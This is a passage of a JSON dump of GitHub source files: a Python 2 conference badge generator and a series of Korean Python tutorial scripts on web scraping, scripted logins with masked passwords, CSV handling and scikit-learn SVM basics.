print(\"[+] Saving: \" + fname)\n img.save(path, dpi=(300.0, 300.0))\n elif os.path.isfile(path): # if file exists and action is not overwrite\n if action == 2: # skip mode\n continue\n print(\"[!] \"+fname+\" exists.\")\n overwrite = raw_input(\"Overwrite? [Y] > \")\n while overwrite.lower() not in ['y','n']:\n print(\"[-] Invalid input.\")\n overwrite = raw_input(\"Overwrite? [Y] > \")\n if overwrite.lower() in ['y', '']:\n print(\"[+] Overwriting \" + fname+\"\\n\")\n img.save(path, dpi=(300.0, 300.0))\n else:\n print(\"[-] Skipping...\\n\")\n continue\n else:\n print(\"[+] Saving: \" + fname)\n img.save(path, dpi=(300.0, 300.0))\n else:\n path = os.path.join(scriptdir, \"Occupations\")\n path = os.path.join(path, fname)\n img.save(path, dpi=(300.0, 300.0))\n\ndef dictionary_to_img(image_dir, data_file, action, group):\n with open(data_file) as f:\n dictionary = eval(f.read()) # CAREFUL\n occupations = []\n for i in range(len(dictionary)):\n if dictionary[i]['Occupation'] not in occupations:\n occupations.append(dictionary[i]['Occupation'])\n\n initialize_occupation_directories(occupations, len(dictionary))\n\n # Is this needed?\n #for i in range(0,len(occupations)):\n # occupations[i]= unicode(occupations[i],\"utf-8\")\n\n for i in range(len(dictionary)):\n name = dictionary[i]['Name'].decode('UTF-8')\n surname = dictionary[i]['Surname'].decode('UTF-8')\n occupation = dictionary[i]['Occupation'].decode('UTF-8')\n university = dictionary[i]['University'].decode('UTF-8')\n\n img = Image.open(image_dir)\n draw_data_to_img(img, name, surname, occupation, university)\n fileName = dictionary[i]['Name'].decode('UTF-8') + \"_\" + dictionary[i]['Surname'].decode('UTF-8') + \".jpg\"\n save_image(img, fileName, occupation, occupations, group, action)\n print(\"[!] Done. Exiting.\")\n"
},
{
"alpha_fraction": 0.6252086758613586,
"alphanum_fraction": 0.6285476088523865,
"avg_line_length": 34.74626922607422,
"blob_id": "d32f2c5b860dd2e19b4e1f3a7427f2c782c03a09",
"content_id": "dfe0d74c6defd2a7bda8cd64f11dcba5750c5280",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2396,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 67,
"path": "/excelParse.py",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "from openpyxl import *\nfrom openpyxl.cell.cell import *\n\nimport sys\n\nDATA_FILE = 'attendees.log'\n\ndef append_from_column(lst, ws, index, length):\n [ lst.append( ws[ index+str(i) ].value ) for i in range(length) ]\n\ndef parse_data(config):\n with open(config) as f:\n import json\n data = json.loads(f.read())\n return data\n\ndef create_dictionary(names, surnames, occupations, universities):\n print (\"[+] Writing everything to a list of dictionaries\")\n full = []\n for i in range(numOfRows): \n dictionary = {\n \"Name\": names[i].encode('utf-8'),\n \"Surname\": surnames[i].encode('utf-8'),\n \"Occupation\": occupations[i].encode('utf-8'),\n \"University\": universities[i].encode('utf-8')\n }\n # print '[!] DEBUG'+str(names[i].decode(\"utf-8\"))\n full.append(dictionary)\n return full\n\ndef parse_excelfile(ws, data_format, numOfRows)\n names = []\n surnames = []\n occupations = []\n universities = []\n\n # Loop through whole excel file\n print (\"[+] Reading worksheet, appending Names/Surnames/Occupations\")\n for column in range(numOfColumns):\n column_letter = get_column_letter(column) # openpyxl function\n if data_format[column_letter].lower() == 'name':\n append_from_column(names, ws, column_letter, numOfRows)\n elif data_format[column_letter].lower() == 'surname': \n append_from_column(surnames, ws, column_letter, numOfRows)\n elif data_format[column_letter].lower() == 'occupation': \n append_from_column(occupations, ws, column_letter, numOfRows)\n elif data_format[column_letter].lower() == 'university':\n append_from_column(universities, ws, column_letter, numOfRows)\n else:\n print \"ERROR!\"\n sys.exit(-1)\n\n return names, surnames, occupations, universities\n\ndef excel_to_dict(file_url, config_file):\n ws = load_workbook(filename=file_url).active\n numOfRows = ws.max_row + 1\n numOfColumns = ws.max_column + 1\n\n data_format = parse_data(config_file)\n names, surnames, occupations, universities = parse_excelfile(ws, data_format, numOfRows)\n dic = createDictionary(names, surnamesm occupations, universities, numOfRows):\n\n print (\"[+] Writing dictionary to file.\")\n with open(DATA_FILE, 'w') as f:\n f.write(str(dic))\n print(\"[!] Done!\")\n\n"
},
{
"alpha_fraction": 0.4919578433036804,
"alphanum_fraction": 0.5146977305412292,
"avg_line_length": 30.086206436157227,
"blob_id": "10dae40fafed616263df6f30b62549ad47534c34",
"content_id": "39403fb45393e291095e3dc6c57ae4088c05b920",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1803,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 58,
"path": "/grid_print.py",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom PIL import Image\nfrom os import *\nimport random\n\ndef get_script_path():\n return path.dirname(path.realpath(sys.argv[0]))\n\ndef combine_badges(grid_size):\n offset = 10\n badge_x, badge_y = 886, 1276\n dims = grid_size * (badge_x + offset), grid_size * (badge_y + offset)\n groups = grid_size * grid_size \n x,y = 0,0\n usedfiles = []\n no_total_files = len(listdir(getcwd()))\n page_number= 0\n npages = no_total_files / groups + 1\n for _ in range(npages):\n i = 0\n j = 0\n page = Image.new('RGB', dims, (255, 255, 255))\n items = listdir(unicode(getcwd()))\n for filename in items:\n #print (item)\n #filename = item.decode('UTF-8')\n #print (filename)\n if filename.endswith(\".jpg\") and (filename not in usedfiles):\n img = Image.open(filename)\n x,y = i*(badge_x+offset),j*(badge_y+offset)\n i+=1\n if i == grid_size:\n j+=1\n i = 0\n page.paste(img, (x, y))\n usedfiles.append(filename)\n else:\n continue\n if j == grid_size and i==0:\n break\n\n page_number += 1\n #print (\"Printing page:\" + str(page_number))\n occupationDir = getcwd()\n occupationDir = path.split(occupationDir)[1]\n filename = str(occupationDir)+\"_\"+str(page_number)+\".jpeg\"\n chdir('..')\n if not path.exists(\"Combined\"):\n mkdir(\"Combined\")\n chdir('Combined')\n page.save(filename,dpi=(300.0, 300.0))\n chdir('..')\n chdir(occupationDir)\n if len(usedfiles) == no_total_files:\n break\n"
},
{
"alpha_fraction": 0.7267683744430542,
"alphanum_fraction": 0.740638017654419,
"avg_line_length": 34.95000076293945,
"blob_id": "20e9c955fcc845abefd1e2a7cdfec2e48cf9c352",
"content_id": "2cba241b0646c30b440ee1727f4157223f5d798e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1442,
"license_type": "no_license",
"max_line_length": 311,
"num_lines": 40,
"path": "/README.md",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "<h1>Conference Badge Creator</h1>\n\nConference Badge Creator is a CLI tool written in Python 2.7. It aims to automate the process of mass-creating the badge for any event of your liking. \nIt takes an Excel File with the Names/Surnames/Occupations of your conference's attendees and a template badge as input and outputs your named badges in a structured folder format. \n\n\nFoo Bar Speaker\nFoo1 Bar1 Volunteer\nFoo2 Bar2 Random\n\nFinal folder structure:\n\n* ConferenceName\n * Speakers\n * Foo1_Bar1.jpg\n * Foo4_Bar4.jpg\n * Foo2_Bar2.jpg\n * Volunteers\n * Foo6_Bar6.jpg\n * Other\n * Foo3_Bar3.jpg\n * Foo3_Bar5.jpg\n\nEach one of the Foo Bar's will have his own folder along with other people who share the same occupation with them. This is done in order to ease the organizing of the badges post-print. The script also includes the option to combine each image to a grid of NxN size for ease at printing on various paper sizes.\n\nHas been tested on Arch Linux. It does _not_ work out of the box, dictTextToImage.py needs adjustments to position the text properly on your badge. \n\nusage:\npython conference_badge_creator.py -t templateFile -e spreadsheetFile\n\nUse -h as an argument to see all the available options.\n\nUse absolute paths to the files in the arguments.\nSupply a config file to specify the format of your data in columns/names.\n{\n \"A\" : \"Name\",\n \"B\" : \"Surname\",\n \"C\" : \"Occupation\",\n \"D\" : \"University\"\n}\n \n"
},
{
"alpha_fraction": 0.6210566163063049,
"alphanum_fraction": 0.6259977221488953,
"avg_line_length": 33.6184196472168,
"blob_id": "68884da0db458dfd409e23ce50580535413bc4ff",
"content_id": "49acd4cc66d9b70cab08fe457bbc46c6ed31937c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2631,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 76,
"path": "/conference_badge_creator.py",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "import argparse\nfrom argparse import RawTextHelpFormatter\nfrom os import *\n\nimport dictTextToImage\nimport excelParse\nimport grid_print\nimport sys\n\nDATA_FILE = 'attendees.log'\n\ndef get_script_path():\n return path.dirname(path.realpath(sys.argv[0]))\n\n\nparser = argparse.ArgumentParser(description=\"\"\"\n Conference Badge Creator\\n\n Version: 1.0\n Author: Georgios A. Konstantopoulos\n Occupation: Electrical Engineering & Computer Engineering\n student at AUTh\n --\n Parse data from excel or dictionary.txt file and print it on your badge.\n Fast, Easy, Open Source.\n \"\"\", epilog='Enjoy!', formatter_class=RawTextHelpFormatter)\ngroup = parser.add_mutually_exclusive_group()\nparser.add_argument(\"-e\", \"--exceldir\", type=str, help='Absolute path to the excel file.')\nparser.add_argument(\"-t\", \"--template\", type=str, help='Absolute path to the template image file.')\ngroup.add_argument(\"-o\", \"--overwrite\", help='Use when you want to overwrite all files if they exist',\n action=\"store_true\")\ngroup.add_argument(\"-s\", \"--skip\", help='Use when you don\\'t want to overwrite existing files', action=\"store_true\")\noption = parser.parse_args()\n\ndef badge_creator():\n excel_dir = option.exceldir\n file_dir = option.template\n action = 0\n if option.skip:\n action = 2\n print \"Skip Mode: ON.\"\n elif option.overwrite:\n action = 1\n print \"Overwrite Mode: ON\"\n else:\n print \"Normal Mode: ON\"\n\n folders = raw_input(\"Group based on occupation > \")\n while folders.lower() not in ['y','n']:\n folders = raw_input(\"Try again\\nGroup? > \")\n folders = folders.lower() == 'y'\n\n excelParse.excel_to_dict(excel_dir)\n dictTextToImage.dictionary_to_img(file_dir, DATA_FILE, action, folders)\n\n combine = raw_input(\"Do you want to combine all your files in a grid?\\nCombine? [N] > \")\n while combine.lower() not in ['y','n']: \n print \"Invalid input. Try again.\"\n combine = raw_input(\"Combine? [N] > \")\n \n if combine.lower() == 'y':\n grid_size = int(raw_input(\"Input grid's dimension (if 3x3 input 3) > \"))\n # print \"Current dir: \"+getcwd()\n # wavedir = os.path.join(get_script_path(),\"Badges Wave 2016\")\n # print \"Wave dir is \"+wavedir\n # chdir(wavedir)\n # print \"Current dir: \"+getcwd()\n for dir in listdir(getcwd()):\n if dir == 'Combined':\n continue\n chdir(dir)\n print \"Combining files in directory: \" + str(dir)\n grid_print.combine_badges(grid_size)\n chdir('..')\n\nif __name__ == '__main__':\n badge_creator()\n"
}
] | 5 |
ipcoo43/pythontwo | https://github.com/ipcoo43/pythontwo | 2dd9e5cda3a2d59bdc7abd1696818933462d75c4 | 763d8e401d3e9a2568fc5b36bbe701f35afd4ae7 | b0071ea492b06c33fbc2dbb68b0d6cb8d7834a31 | refs/heads/master | 2020-05-16T01:37:45.890482 | 2019-04-24T01:33:48 | 2019-04-24T01:33:48 | 182,606,062 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6630434989929199,
"alphanum_fraction": 0.679347813129425,
"avg_line_length": 22,
"blob_id": "4c1dfd22b85f04c7d01d5ff94149c8313357fa9e",
"content_id": "c219a1176b05a3477fdb94ba02b6f0a1d08d4e24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 8,
"path": "/lesson126.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import csv, codecs\n\nfilename = 'test.csv'\nfile = codecs.open(filename, 'r', 'euc_kr')\n\nreader = csv.reader(file,delimiter=\",\")\nfor cells in reader:\n\tprint(cells[0], cells[1],cells[2]) "
},
{
"alpha_fraction": 0.7439824938774109,
"alphanum_fraction": 0.7439824938774109,
"avg_line_length": 27.625,
"blob_id": "11b44f822bff1bd5a813b60ebdd4733f59c633d8",
"content_id": "802db026ee4ddc76d321adafa336dcaeabef6eb0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/lesson133.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from sklearn import svm, metrics\nimport pandas\nfrom sklearn.model_selection import train_test_split\n\ncsv = pandas.read_csv('iris.csv')\ndata = csv[['SepalLength','SepalWidth','PetalLength','PetalWidth']]\nlabel = csv['Name']\n\ntrain_date, test_data, train_label, test_label = train_test_split(data, label)\n\nclf = svm.SVC()\nclf.fit(train_date,train_label)\nresults = clf.predict(test_data)\n\nscore = metrics.accuracy_score(results,test_label)\nprint('정답률 :',score)"
},
{
"alpha_fraction": 0.7232142686843872,
"alphanum_fraction": 0.7247023582458496,
"avg_line_length": 23.035715103149414,
"blob_id": "e8bd5e03a7f3a196cf6d67a65efd5b7fdb9c84c9",
"content_id": "3c0f433d686425063e92ce0db678b46c25e5a008",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 770,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 28,
"path": "/lesson116.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\n\nurl = 'https://nid.naver.com/nidlogin.login'\n\n# PhantomJS 드라이버 추출하기\nbrowser = webdriver.PhantomJS()\nbrowser.implicitly_wait(3)\n\n# 로그인 하기\nbrowser.get(url)\nelement_id = browser.find_element_by_id('id') # 아이드 텍스트 입력 상자\nelement_id.clear()\nelement_id.send_keys('idopark')\nelement_pw = browser.find_element_by_id('pw') # 비밀번호 텍스트 입력 상자\nelement_pw.clear()\nelement_pw.send_keys('*********')\n\nbrowser.save_screenshot('website_c.png')\n\nbutton = browser.find_element_by_css_selector(\"input.btn_global[type=submit]\")\nbutton.submit()\n\n# 메일페이지 열기\nbrowser.get('https://mail.naver.com/')\nbrowser.save_screenshot('website_d.png')\n\n# 브라우저 종료하기\nbrowser.quit()"
},
{
"alpha_fraction": 0.6969112157821655,
"alphanum_fraction": 0.7818532586097717,
"avg_line_length": 31.375,
"blob_id": "42a26467fa9c7fda21f7d7d8afdab7c1417d7219",
"content_id": "b792dd423474584c36cb6006ec16908676924a12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 16,
"path": "/lesson113.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "\ndocker pull ubuntu:16.04\ndocker run -it ubuntu:16.04\napt update\napt install -y python3 python3-pip\npip3 install selenium\npip3 install beautifulsoup4\napt install -y wget libfontconfig\nmkdir -p /home/root/src && cd $_\nwget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-x86_64.tar.bz2\ntar jxvf phantomjs-2.1.1-linux-x86_64.tar.bz2\ncd phantomjs-2.1.1-linux-x86_64/bin/\ncp phantomjs /usr/local/bin/\napt install -y fonts-nanum*\nexit\ndocker ps -a\ndocker commit <컨테이너이름:858f2bb41f78> ubnuntu-phantomjs"
},
{
"alpha_fraction": 0.7436708807945251,
"alphanum_fraction": 0.7452531456947327,
"avg_line_length": 32.31578826904297,
"blob_id": "297a5dd1207c1430ce3cfec0c3728c1a5868127c",
"content_id": "fa24152e77df610714878327834a6b6da428b4b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 632,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 19,
"path": "/lesson117.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\n\ndriver = webdriver.PhantomJS()\ndriver.get('https://www.indischool.com/index.php?act=dispMemberLoginForm')\ndriver.implicitly_wait(3)\n\ndriver.find_element_by_id('uid').send_keys('doglee')\ndriver.find_element_by_id('upw').send_keys('*******')\ndriver.find_element_by_css_selector('.hi.button.button-primary.button-expand').click()\n# driver.save_screenshot('website_a.png')\n\ndriver.get('https://www.indischool.com/libClass')\ntitles = driver.find_elements_by_css_selector('span.title-link')\nprint(titles)\nfor title in titles:\n\tprint('-', title.text)\n\ndriver.quit()\n# driver.save_screenshot('website_a.png')"
},
{
"alpha_fraction": 0.5097087621688843,
"alphanum_fraction": 0.5606796145439148,
"avg_line_length": 21.94444465637207,
"blob_id": "222ff2f2705a6581fd6312c5e1a1b9ffc26c4c03",
"content_id": "c6fb6d6dae55a586c5d4a56a26ed7dfb68287625",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 18,
"path": "/lesson105.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ Request ]\n- 요청 방식 : GET, POST, PUT, DELETE, PATCH\n- 요청 대상 : media.daum.net => HostName\n- 추가적인 정보 \n > 경로 : /photo-viewer => Path\n > 데이터 : ?cid = 318190 => GET방식\n > 헤시 : #2017060505\n\n[ 분석 ]\n- 요청 방식 : GET\n- 요청 대상 : search.naver.com/ => HostName\n- 추가적인 정보 \n > 경로 : /search.naver => Path\n > 데이터 :?sm=tab_sug.top => 요청 매개 변수\n\t\t\t\t\t\t&where=kin\n\t\t\t\t\t\t&query=초콜릿(디코딩) # %EC%B4%88%EC%BD%9C%EB%A6%BF(인코딩)\n''')"
},
{
"alpha_fraction": 0.6739811897277832,
"alphanum_fraction": 0.6823406219482422,
"avg_line_length": 24.210525512695312,
"blob_id": "fd8d2cfeed8be111e7da6ec3745d34e410982013",
"content_id": "c1f884083c9320ce638a521d6113ad5c2e2af930",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1023,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 38,
"path": "/lesson109.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "# 모듈 추출하기\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport time\n\n# 기사 목록을 가져 오기\nurl = 'https://news.naver.com/main/home.nhn'\nhtml = urllib.request.urlopen(url)\nsoup = BeautifulSoup(html,'html.parser')\n\nresults = soup.select('.mlist2.no_bg a') #strong\n\nwith open('test.txt','w',encoding='utf-8') as fp:\n\tfp.write('')\n\nfor result in results:\n\t# 기사 가져 오기\n\t# print(result.attrs['href'])\n\turl_article = result.attrs['href']\n\thtml = urllib.request.urlopen(url_article)\n\tsoup_article = BeautifulSoup(html,'html.parser')\n\tcontent = soup_article.select_one('#articleBodyContents')\n\t# print(content.contents)\n\t\n\t# 가공 하기\n\toutput = ''\n\tfor item in content.contents:\n\t\tstripped = str(item).strip()\n\t\tif stripped == '':\n\t\t\tcontinue\n\t\tif stripped[0] not in ['<','/']:\n\t\t\toutput += str(item).strip()\n\twcontent = output.replace('본문 내용TV플레이어','')\n\tprint(wcontent)\n\tprint('-'*70)\n\ttime.sleep(1)\n\twith open('test.txt','a',encoding='utf-8') as fp:\n\t\tfp.write(wcontent)"
},
{
"alpha_fraction": 0.6924778819084167,
"alphanum_fraction": 0.7057521939277649,
"avg_line_length": 33.846153259277344,
"blob_id": "30aca4f08736493b7fd6d98317b35be54fb27916",
"content_id": "e8041e2ec2ef6811c153f70b0d8c0329b9c84614",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 13,
"path": "/lesson119.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport urllib.request\n\nurl = 'http://www.weather.go.kr/weather/forecast/mid-term-rss3.jsp?stnId=108'\nrequest = urllib.request.urlopen(url)\nxml = request.read()\n\nsoup = BeautifulSoup(xml,'html.parser')\nseoul = soup.find_all('location')[2]\nprint(seoul.city)\nprint('날짜\\t','\\t날씨','최저','최고',sep='\\t')\nfor item in seoul.find_all('data'):\n\tprint(item.tmef.string,':',item.find('wf').text,',',item.tmn.string,',',item.tmx.string)"
},
{
"alpha_fraction": 0.6903114318847656,
"alphanum_fraction": 0.6972318291664124,
"avg_line_length": 23.08333396911621,
"blob_id": "1a800fa4872550fa41d3aca582ae776ed4e34715",
"content_id": "5e81f4c9991e0535c74b345b99cd48015280d6ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 620,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/lesson112.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\n\n# 세션 만들기\nsession = requests.session()\n\n# 로그인\nurl = 'http://www.hanbit.co.kr//member/login_proc.php'\ndata = {\n\t'return_url':'http://www.hanbit.co.kr/index.html',\n\t'm_id':'ipcoo43',\n\t'm_passwd':'********'\n}\n\nresponse = session.post(url, data=data)\nresponse.raise_for_status()\n\n# 마일리지 가져와 보기\nurl = 'http://www.hanbit.co.kr/myhanbit/myhanbit.html'\nresponse = session.get(url)\nresponse.raise_for_status()\nsoup = BeautifulSoup(response.text,'html.parser')\ntext = soup.select_one('.mileage_section1 span').get_text()\nprint('마일리지 :',text)\n"
},
{
"alpha_fraction": 0.644859790802002,
"alphanum_fraction": 0.6869158744812012,
"avg_line_length": 21.578947067260742,
"blob_id": "e72db6ac29ccf84f4c695a736711f48bf7e938a6",
"content_id": "718bcab4715d53e879321f3a942a918193d46d24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 448,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 19,
"path": "/lesson131.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\npip install -U scikit-learn scipy matplotlib scikit-image\npip install pandas\n''')\n\nfrom sklearn import svm, metrics\n\ndatas = [[0,0],[1,0],[0,1],[1,1]]\nlabels = [0,1,1,0]\nexamples = [[0,0],[1,0]]\nexamples_label = [0,1]\n\nclf = svm.SVC()\nclf.fit(datas, labels)\nresults = clf.predict(examples)\nprint(results)\n# metrics.accuracy_score(답, 예측했던 결과)\nscore = metrics.accuracy_score(examples_label, results)\nprint('정답률 :',score)"
},
{
"alpha_fraction": 0.5421686768531799,
"alphanum_fraction": 0.5421686768531799,
"avg_line_length": 34.71428680419922,
"blob_id": "174c2d410f5294e258985d7412cd045e34e42fa0",
"content_id": "83bed667eeb359f6813da0f30bafdf89f9837b31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 303,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 7,
"path": "/lesson134.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from sklearn import model_selection, svm, metrics\n\nclf = svm.SVC() # 기계학습 알고리즘 선택 \nclf.fit # 학습 하기\npredict = clf.predict() # 예측 하기\nscore = metrics.accuracy_score() # 정답률 구하기\nprint('정답률 :',score)"
},
{
"alpha_fraction": 0.5729386806488037,
"alphanum_fraction": 0.579281210899353,
"avg_line_length": 15.892857551574707,
"blob_id": "b11a1325499bf475a25a3f5a4b386c59bfd8b172",
"content_id": "7bf6163b871a72e2701e9ec71056f29ff1eefd32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 28,
"path": "/lesson110.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import time\n'''\nwith open('test.txt','r',encoding='utf-8') as fp:\n\tfor i in fp:\n\t\tprint(i.replace('.','\\n'))\n\t\ttime.sleep(1)\n\nf = open(\"test.txt\", 'r')\nwhile True:\n line = f.readline()\n if not line: break\n print(line)\nf.close()\n\nf = open(\"test.txt\")\ntry:\n for line in f:\n print(line)\n # 한줄씩 처리하는 코드\nfinally:\n f.close()\n'''\nf_name='test.txt'\nwith open(f_name) as ifp:\n\tlines = ifp.read().split('.')\n\tfor line in lines:\n\t\tprint(line)\n\t\ttime.sleep(3)\n"
},
{
"alpha_fraction": 0.6692913174629211,
"alphanum_fraction": 0.6850393414497375,
"avg_line_length": 16,
"blob_id": "bcab39cd911f481157bb7dea54089314342168e0",
"content_id": "1a9154b87e40124ebfef2f3c5155160d580022ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 15,
"path": "/lesson111.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import requests\n\nurl = 'https://google.com'\ndata = {\n\t'a':'10',\n\t'b':'20'\n}\nsession = requests.session()\nresponse = session.get(url, data=data)\n# session.post(url)\n# session.put(url)\n# session.delete(url)\nresponse.raise_for_status()\n\nprint(response.text)"
},
{
"alpha_fraction": 0.4413793087005615,
"alphanum_fraction": 0.5471264123916626,
"avg_line_length": 15.129630088806152,
"blob_id": "eeef80a4a4dfae52ac0a238d70cba8065a86994b",
"content_id": "59b708b884c9b5c83969925ada0c98a1e1c7e757",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1182,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 54,
"path": "/lesson124.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ CSV/TSV ]\n- CSV : Comma-Seperated Value => 쉼표로 구분된 값\n > 1000,비누,300 => 쉼표로 구분 (CSV)\n > 1002 마스크 230 => 띄어 쓰기로 구분 (SSV)\n > 1001\t 장갑\t 150 => 탭으로 구분 (TSV)\n- 한 줄에 데이터는 하나\n- 한 줄에는 쉼표로 속성을 구분\n- 첫 번째 줄은 헤더로 사용 가능\n''')\nprint('''\n[ xml, json, csv 데이터 비교 ]\n1. xml 데이터 \n\t<product>\n\t\t<product id=\"1000\">\n\t\t\t<name>비누</name>\n\t\t\t<price>300</price>\n\t\t</product>\n\t\t<product id=\"1001\">\n\t\t\t<name>장갑</name>\n\t\t\t<price>400</price>\n\t\t</product>\n\t\t<product id=\"1002\">\n\t\t\t<name>마스크</name>\n\t\t\t<price>500</price>\n\t\t</product>\n\t</product>\n\n2. json 데이터\n\t[{\n\t\tID:1000,\n\t\t이름:\"비누\",\n\t\t가격:300\n\t},{\n\t\tID:1001,\n\t\t이름:\"장갑\",\n\t\t가격:400\n\t},{\n\t\tID:1002,\n\t\t이름:\"마스크\",\n\t\t가격:500\n\t}]\n\n3. csv 데이터\n\tID,이름,가격\n\t1000,비누,300\n\t1001,장갑,400\n\t1002,마스크,5000\n\n4. 데이터 용량 비교 : csv > json > xml\n5. 표현력 비교 : xml > json > csv\n6. 가독성 비교 : xml > json > csv\n7. 최근 동향 : json(현재 많이 사용), csv(데이터 큰 용량의 장점)를 많이 사용\n''')"
},
{
"alpha_fraction": 0.5475578308105469,
"alphanum_fraction": 0.5989717245101929,
"avg_line_length": 15.956521987915039,
"blob_id": "be389eace398e35d88336d0e80fb9179cdd02105",
"content_id": "8d5ecfd7c1574f43e77c148b542405f213d20ea1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 503,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 23,
"path": "/lesson130.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\npip install -U scikit-learn scipy matplotlib scikit-image\npip install pandas\n''')\n\nfrom sklearn import svm\n\nclf = svm.SVC()\n# clf.fit(데이터,답[레이블])\nclf.fit([\n\t[0,0], # 각각의 요소를 벡터\n\t[1,0], # 데이터를 어떻게 넣으냐가 기계학습의 중요 포인트\n\t[0,1],\n\t[1,1]\n],[0, 1, 1,\t0 ]\n)\n# clf.predict() 우리가 원하는 답[레이블]의 형식을 넣음, predict는 예측하다.\nresults = clf.predict([\n\t[0,0], # 0\n\t[1,0] # 1\n]) # [0 1]\n\nprint(results)"
},
{
"alpha_fraction": 0.6041939854621887,
"alphanum_fraction": 0.6107470393180847,
"avg_line_length": 23.645160675048828,
"blob_id": "907e56eaa66d09743bc240dcfac4165e38ab2d25",
"content_id": "90c29a99c4973f2e2daf7de9ef6454fc7a0ef19d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1045,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 31,
"path": "/lesson107.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
